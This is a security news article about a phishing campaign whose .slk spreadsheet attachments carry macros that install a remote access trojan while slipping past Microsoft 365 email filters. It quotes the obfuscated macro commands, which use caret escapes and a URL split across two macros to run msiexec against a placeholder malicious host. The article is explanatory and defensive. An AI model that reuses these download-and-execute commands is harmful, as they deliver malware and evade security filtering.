Hackers use a new attack method that bypasses both Microsoft 365 default security (EOP) and advanced security (ATP).
The attack campaign specifically crafted to bypass Microsoft 365 uses a malicious .slk attachment that contains a macro embedded to download and install a remote access trojan.
The attack was detected by Avanan’s Security Analysts, according to analysts “At the time of writing, Microsoft 365 is still vulnerable and the attack is still being used extensively against Microsoft 365 customers.”
The “Symbolic Link” (SLK) is a text-based spreadsheet format, it is an alternative file format to XLSX. It’s very rare for anyone to receive the SLK files.
If you have the files received in your inbox, then likely you are being targeted by Remote Access Trojan malware that upgraded to bypass Advanced Threat Protection.
“The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations,” reads Avanan report.
Attackers use highly customized emails to attack their targets, they are highly customized and uses topic most relevant organization and the individual targeted.
Here is the sample mail with attached SLK file
Following are the obfuscation techniques used to bypass ATP
The email found to be sent from thousands of Hotmail email address, attackers use it as an advantage to bypass security filters.
The macro script also includes escape characters to confuse ATP filters
M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q
Also to confuse ATP the attackers split the URL into two macros
First macro
set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JBfoT.bat
Second macro
set /p=””e.com/install.php ^/q”” >> JBfoT.bat & JBfoT.bat
The malicious SLK file runs two to create a malicious install script that install software based on commands provided by attackers.
Mitigation
Users are recommended configure your Office 365 account to reject files SLK files as they are relatively rare.
You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity, and hacking news updates.
Also Read
Cybercriminals have developed PhishWP, a malicious WordPress plugin, to facilitate sophisticated phishing attacks, which enable…
FireScam is multi-stage malware disguised as a fake “Telegram Premium” app that steals data and…
Over the past year, malicious actors have been abusing OAST services for data exfiltration, C2…
A phishing campaign spoofing the United States Social Security Administration emerged in September 2024, delivering…
The Kaspersky researchers investigation into the EAGERBEE backdoor revealed its deployment within Middle Eastern ISPs…
CyTwist, a leader in advanced next-generation threat detection solutions, has launched its patented detection engine…
View Comments
Hey GURUBARAN S,
Your Post is too good dude, there is lots of very useful information. I have read lots of blog related with this but Those tips I can't able to find out in others blog.
Thanks for sharing.